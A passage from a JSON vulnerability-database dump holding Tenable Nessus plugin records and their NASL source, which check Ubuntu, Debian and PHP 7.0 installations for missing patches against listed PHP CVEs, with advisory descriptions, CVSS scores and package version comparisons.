discovered that PHP incorrectly handled moving files\nwhen a pathname contained a null character. A remote attacker could\nuse this issue to possibly bypass filename restrictions. This issue\nonly applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)\n\nIt was discovered that PHP incorrectly handled unserializing PHAR\nfiles. A remote attacker could use this issue to cause PHP to possibly\nexpose sensitive information. (CVE-2015-2783)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing\ncertain objects. A remote attacker could use this issue to cause PHP\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2015-2787).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2018 Canonical, Inc. / NASL script (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04|12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.2-1ubuntu4.30\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.30\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cli\", pkgver:\"5.3.2-1ubuntu4.30\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.10-1ubuntu3.18\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.18\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cli\", pkgver:\"5.3.10-1ubuntu3.18\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-fpm\", pkgver:\"5.3.10-1ubuntu3.18\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.12+dfsg-2ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"php5-cgi\", pkgver:\"5.5.12+dfsg-2ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"php5-cli\", pkgver:\"5.5.12+dfsg-2ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"php5-fpm\", pkgver:\"5.5.12+dfsg-2ubuntu4.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php5-cgi / php5-cli / php5-fpm\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:32:32", "references": ["http://php.net/ChangeLog-7.php#7.0.15"], "pluginID": "96800", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.15. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to a use-after-free error in the unserialize() function that is triggered when using DateInterval input. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2015-2787)\n\n - A use-after-free error exists that is triggered when handling unserialized object properties. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2016-7479)\n\n - An integer overflow condition exists in the\n _zend_hash_init() function in zend_hash.c due to improper validation of unserialized objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-5340)\n\n - A floating pointer exception flaw exists in the exif_convert_any_to_int() function in exif.c that is triggered when handling TIFF and JPEG image tags. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (CVE-2016-10158)\n\n - An integer overflow condition exists in the phar_parse_pharfile() function in phar.c due to improper validation when handling phar archives. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (CVE-2016-10159)\n\n - An off-by-one overflow condition exists in the phar_parse_pharfile() function in phar.c due to improper parsing of phar archives. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (CVE-2016-10160)\n\n - An out-of-bounds read error exists in the finish_nested_data() function in var_unserializer.c due to improper validation of unserialized data. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition or the disclosure of memory contents.\n (CVE-2016-10161)\n\n - A NULL pointer dereference flaw exists in the php_wddx_pop_element() function in wddx.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (CVE-2016-10162)\n\n - An signed integer overflow condition exists in gd_io.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to have an unspecified impact. (VulnDB 150680)\n\n - A type confusion flaw exists that is triggered during the deserialization of specially crafted GMP objects. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (VulnDB 150227)\n\n - A type confusion error exists that is triggered when deserializing ZVAL objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n (VulnDB 150228)\n\n - An out-of-bounds read error exists in the phar_parse_pharfile() function in phar.c due to improper parsing of phar archives. An unauthenticated, remote attacker can exploit this to cause a crash, resulting in a denial of service condition. (VulnDB 149621)\n\n - A denial of service vulnerability exists in the bundled GD Graphics Library (LibGD) in the gdImageCreateFromGd2Ctx() function in gd_gd2.c due to improper validation of images. An unauthenticated, remote attacker can exploit this, via a specially crafted image, to crash the process. (VulnDB 150576)", "edition": 8, "reporter": "Tenable", "published": "2017-01-26T00:00:00", "title": "PHP 7.0.x < 7.0.15 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2787", "CVE-2017-5340", "CVE-2016-10160", "CVE-2016-7479", "CVE-2016-10162", "CVE-2016-10159", "CVE-2016-10161", "CVE-2016-10158"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_7_0_15.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96800", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96800);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2015-2787\",\n \"CVE-2016-7479\",\n \"CVE-2017-5340\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2016-10162\"\n );\n script_bugtraq_id(\n 73431,\n 95151,\n 95371,\n 95668,\n 95764,\n 95768,\n 95774,\n 95783\n );\n\n script_name(english:\"PHP 7.0.x < 7.0.15 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 7.0.x prior to 7.0.15. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists due to a\n use-after-free error in the unserialize() function that\n is triggered when using DateInterval input. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in a denial\n of service condition or the execution of arbitrary code.\n (CVE-2015-2787)\n\n - A use-after-free error exists that is triggered when\n handling unserialized object properties. An \n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to execute arbitrary code.\n (CVE-2016-7479)\n\n - An integer overflow condition exists in the\n _zend_hash_init() function in zend_hash.c due to\n improper validation of unserialized objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-5340)\n\n - A floating pointer exception flaw exists in the\n exif_convert_any_to_int() function in exif.c that is\n triggered when handling TIFF and JPEG image tags. An\n unauthenticated, remote attacker can exploit this to\n cause a crash, resulting in a denial of service\n condition. (CVE-2016-10158)\n\n - An integer overflow condition exists in the\n phar_parse_pharfile() function in phar.c due to improper\n validation when handling phar archives. An\n unauthenticated, remote attacker can exploit this to\n cause a crash, resulting in a denial of service\n condition. (CVE-2016-10159)\n\n - An off-by-one overflow condition exists in the\n phar_parse_pharfile() function in phar.c due to improper\n parsing of phar archives. An unauthenticated, remote\n attacker can exploit this to cause a crash, resulting in\n a denial of service condition. (CVE-2016-10160)\n\n - An out-of-bounds read error exists in the\n finish_nested_data() function in var_unserializer.c due\n to improper validation of unserialized data. An\n unauthenticated, remote attacker can exploit this to\n cause a crash, resulting in a denial of service\n condition or the disclosure of memory contents.\n (CVE-2016-10161)\n\n - A NULL pointer dereference flaw exists in the\n php_wddx_pop_element() function in wddx.c due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a crash, resulting in a denial of service\n condition. (CVE-2016-10162)\n\n - An signed integer overflow condition exists in gd_io.c\n due to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (VulnDB 150680)\n\n - A type confusion flaw exists that is triggered during\n the deserialization of specially crafted GMP objects. An\n unauthenticated, remote attacker can exploit this to\n cause a crash, resulting in a denial of service\n condition. (VulnDB 150227)\n\n - A type confusion error exists that is triggered when\n deserializing ZVAL objects. An unauthenticated, remote\n attacker can exploit this to execute arbitrary code.\n (VulnDB 150228)\n\n - An out-of-bounds read error exists in the\n phar_parse_pharfile() function in phar.c due to improper\n parsing of phar archives. An unauthenticated, remote\n attacker can exploit this to cause a crash, resulting in\n a denial of service condition. (VulnDB 149621)\n\n - A denial of service vulnerability exists in the bundled\n GD Graphics Library (LibGD) in the\n gdImageCreateFromGd2Ctx() function in gd_gd2.c due to\n improper validation of images. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted image, to crash the process. (VulnDB 150576)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.15\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.15 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.x\", port);\n\nfix = \"7.0.15\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:10:50", "references": ["https://lists.debian.org/debian-lts-announce/2015/04/msg00025.html", "https://packages.debian.org/source/squeeze-lts/php5"], "pluginID": "83144", "description": "CVE-2014-9705 Heap-based buffer overflow in the enchant_broker_request_dict function in ext/enchant/enchant.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 allows remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries.\n\nCVE-2015-0232 The exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.\n\nCVE-2015-2301 Use-after-free vulnerability in the phar_rename_archive function in phar_object.c in PHP before 5.5.22 and 5.6.x before 5.6.6 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file.\n\nCVE-2015-2331 Integer overflow in the _zip_cdir_new function in zip_dirent.c in libzip 0.11.2 and earlier, as used in the ZIP extension in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a ZIP archive that contains many entries, leading to a heap-based buffer overflow.\n\nCVE-2015-2783 Buffer Over-read in unserialize when parsing Phar\n\nCVE-2015-2787 Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages use of the unset function within an __wakeup function, a related issue to CVE-2015-0231.\n\nCVE-2015-3329 Buffer Overflow when parsing tar/zip/phar in phar_set_inode)\n\nCVE-2015-3330 PHP potential remote code execution with apache 2.4 apache2handler\n\nCVE-2015-temp-68819 denial of service when processing a crafted file with Fileinfo\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2015-04-30T00:00:00", "title": "Debian DLA-212-1 : php5 security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2015-2331"], "modified": "2018-07-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5-xsl", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-curl", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-ldap"], "id": "DEBIAN_DLA-212.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83144", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-212-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83144);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2014-9705\", \"CVE-2015-0232\", \"CVE-2015-2301\", \"CVE-2015-2331\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-3330\");\n script_bugtraq_id(72541, 73031, 73037, 73182, 73431, 74204, 74239, 74240);\n\n script_name(english:\"Debian DLA-212-1 : php5 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-9705 Heap-based buffer overflow in the\nenchant_broker_request_dict function in ext/enchant/enchant.c in PHP\nbefore 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 allows\nremote attackers to execute arbitrary code via vectors that trigger\ncreation of multiple dictionaries.\n\nCVE-2015-0232 The exif_process_unicode function in ext/exif/exif.c in\nPHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows\nremote attackers to execute arbitrary code or cause a denial of\nservice (uninitialized pointer free and application crash) via crafted\nEXIF data in a JPEG image.\n\nCVE-2015-2301 Use-after-free vulnerability in the phar_rename_archive\nfunction in phar_object.c in PHP before 5.5.22 and 5.6.x before 5.6.6\nallows remote attackers to cause a denial of service or possibly have\nunspecified other impact via vectors that trigger an attempted\nrenaming of a Phar archive to the name of an existing file.\n\nCVE-2015-2331 Integer overflow in the _zip_cdir_new function in\nzip_dirent.c in libzip 0.11.2 and earlier, as used in the ZIP\nextension in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before\n5.6.7 and other products, allows remote attackers to cause a denial of\nservice (application crash) or possibly execute arbitrary code via a\nZIP archive that contains many entries, leading to a heap-based buffer\noverflow.\n\nCVE-2015-2783 Buffer Over-read in unserialize when parsing Phar\n\nCVE-2015-2787 Use-after-free vulnerability in the process_nested_data\nfunction in ext/standard/var_unserializer.re in PHP before 5.4.39,\n5.5.x before 5.5.23, and 5.6.x before 5.6.7 allows remote attackers to\nexecute arbitrary code via a crafted unserialize call that leverages\nuse of the unset function within an __wakeup function, a related issue\nto CVE-2015-0231.\n\nCVE-2015-3329 Buffer Overflow when parsing tar/zip/phar in\nphar_set_inode)\n\nCVE-2015-3330 PHP potential remote code execution with apache 2.4\napache2handler\n\nCVE-2015-temp-68819 denial of service when processing a crafted file\nwith Fileinfo\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/04/msg00025.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3.1-7+squeeze26\")) flag++;\nif (deb_check(release:\"6.0\", 